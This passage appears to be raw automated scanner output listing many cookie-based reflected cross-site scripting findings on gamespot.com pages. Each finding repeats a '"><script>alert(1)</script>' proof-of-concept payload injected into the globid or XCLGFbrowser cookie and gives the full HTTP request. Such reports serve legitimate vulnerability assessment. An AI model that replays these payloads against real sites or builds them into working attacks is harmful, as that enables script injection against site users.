This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /search.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw684f4"><script>alert(1)</script>cc460fdc769; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42a0a"><script>alert(1)</script>41f2466167a was submitted in the globid cookie. This input was echoed as 42a0a\"><script>alert(1)</script>41f2466167a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /search.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX42a0a"><script>alert(1)</script>41f2466167a; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c91e7"><script>alert(1)</script>bd9e5e2075a was submitted in the XCLGFbrowser cookie. This input was echoed as c91e7\"><script>alert(1)</script>bd9e5e2075a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /signup/raptr/upgrade.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwc91e7"><script>alert(1)</script>bd9e5e2075a; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44732"><script>alert(1)</script>8152d6e45c was submitted in the globid cookie. This input was echoed as 44732\"><script>alert(1)</script>8152d6e45c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /signup/raptr/upgrade.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX44732"><script>alert(1)</script>8152d6e45c; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9fcd"><script>alert(1)</script>50d3eaa4a96 was submitted in the XCLGFbrowser cookie. This input was echoed as c9fcd\"><script>alert(1)</script>50d3eaa4a96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /video/6258426 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwc9fcd"><script>alert(1)</script>50d3eaa4a96; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13c9f</script><script>alert(1)</script>321341f8923 was submitted in the XCLGFbrowser cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/6258426 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw13c9f</script><script>alert(1)</script>321341f8923; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71dde"><script>alert(1)</script>769e6868c7d was submitted in the globid cookie. This input was echoed as 71dde\"><script>alert(1)</script>769e6868c7d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /video/6258426 HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX71dde"><script>alert(1)</script>769e6868c7d; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 617d1"><script>alert(1)</script>d8ccba29170 was submitted in the XCLGFbrowser cookie. This input was echoed as 617d1\"><script>alert(1)</script>d8ccba29170 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /videos/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw617d1"><script>alert(1)</script>d8ccba29170; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51fd6"><script>alert(1)</script>9e5ca85ea5b was submitted in the globid cookie. This input was echoed as 51fd6\"><script>alert(1)</script>9e5ca85ea5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /videos/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX51fd6"><script>alert(1)</script>9e5ca85ea5b; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4638"><script>alert(1)</script>fa98f5a60bf was submitted in the XCLGFbrowser cookie. This input was echoed as b4638\"><script>alert(1)</script>fa98f5a60bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /wii/action/smb/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwb4638"><script>alert(1)</script>fa98f5a60bf; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ee6c"><script>alert(1)</script>55433f00df9 was submitted in the globid cookie. This input was echoed as 8ee6c\"><script>alert(1)</script>55433f00df9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /wii/action/smb/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX8ee6c"><script>alert(1)</script>55433f00df9; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 700b0"><script>alert(1)</script>38565e86bec was submitted in the XCLGFbrowser cookie. This input was echoed as 700b0\"><script>alert(1)</script>38565e86bec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /wii/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw700b0"><script>alert(1)</script>38565e86bec; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6af66"><script>alert(1)</script>9b0a152bf6f was submitted in the globid cookie. This input was echoed as 6af66\"><script>alert(1)</script>9b0a152bf6f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /wii/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX6af66"><script>alert(1)</script>9b0a152bf6f; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0a00"><script>alert(1)</script>c9c5d1170f2 was submitted in the XCLGFbrowser cookie. This input was echoed as a0a00\"><script>alert(1)</script>c9c5d1170f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox/action/gta4/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwa0a00"><script>alert(1)</script>c9c5d1170f2; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e4a"><script>alert(1)</script>fa4be925fe was submitted in the globid cookie. This input was echoed as 14e4a\"><script>alert(1)</script>fa4be925fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox/action/gta4/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX14e4a"><script>alert(1)</script>fa4be925fe; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1806b"><script>alert(1)</script>cc0b76ff2b7 was submitted in the XCLGFbrowser cookie. This input was echoed as 1806b\"><script>alert(1)</script>cc0b76ff2b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/action/assassinscreedbrotherhood/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw1806b"><script>alert(1)</script>cc0b76ff2b7; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d32"><script>alert(1)</script>79e68176e87 was submitted in the globid cookie. This input was echoed as 47d32\"><script>alert(1)</script>79e68176e87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/action/assassinscreedbrotherhood/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX47d32"><script>alert(1)</script>79e68176e87; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0619"><script>alert(1)</script>9e97034893f was submitted in the XCLGFbrowser cookie. This input was echoed as f0619\"><script>alert(1)</script>9e97034893f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/action/callofduty7workingtitle/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwf0619"><script>alert(1)</script>9e97034893f; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1684b"><script>alert(1)</script>0739460a904 was submitted in the globid cookie. This input was echoed as 1684b\"><script>alert(1)</script>0739460a904 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/action/callofduty7workingtitle/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX1684b"><script>alert(1)</script>0739460a904; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload affbd"><script>alert(1)</script>c1a05c68879 was submitted in the XCLGFbrowser cookie. This input was echoed as affbd\"><script>alert(1)</script>c1a05c68879 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/action/grandtheftautoivtheballadofgaytony/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwaffbd"><script>alert(1)</script>c1a05c68879; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8db"><script>alert(1)</script>fcb3e303d03 was submitted in the globid cookie. This input was echoed as 9e8db\"><script>alert(1)</script>fcb3e303d03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/action/grandtheftautoivtheballadofgaytony/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX9e8db"><script>alert(1)</script>fcb3e303d03; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b765b"><script>alert(1)</script>2f8a5308f0 was submitted in the XCLGFbrowser cookie. This input was echoed as b765b\"><script>alert(1)</script>2f8a5308f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/action/reddeadredemption/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwb765b"><script>alert(1)</script>2f8a5308f0; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64335"><script>alert(1)</script>cbdaecb1a55 was submitted in the globid cookie. This input was echoed as 64335\"><script>alert(1)</script>cbdaecb1a55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /xbox360/action/reddeadredemption/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX64335"><script>alert(1)</script>cbdaecb1a55; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7249b"><script>alert(1)</script>55d67d26090 was submitted in the XCLGFbrowser cookie. This input was echoed as 7249b\"><script>alert(1)</script>55d67d26090 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
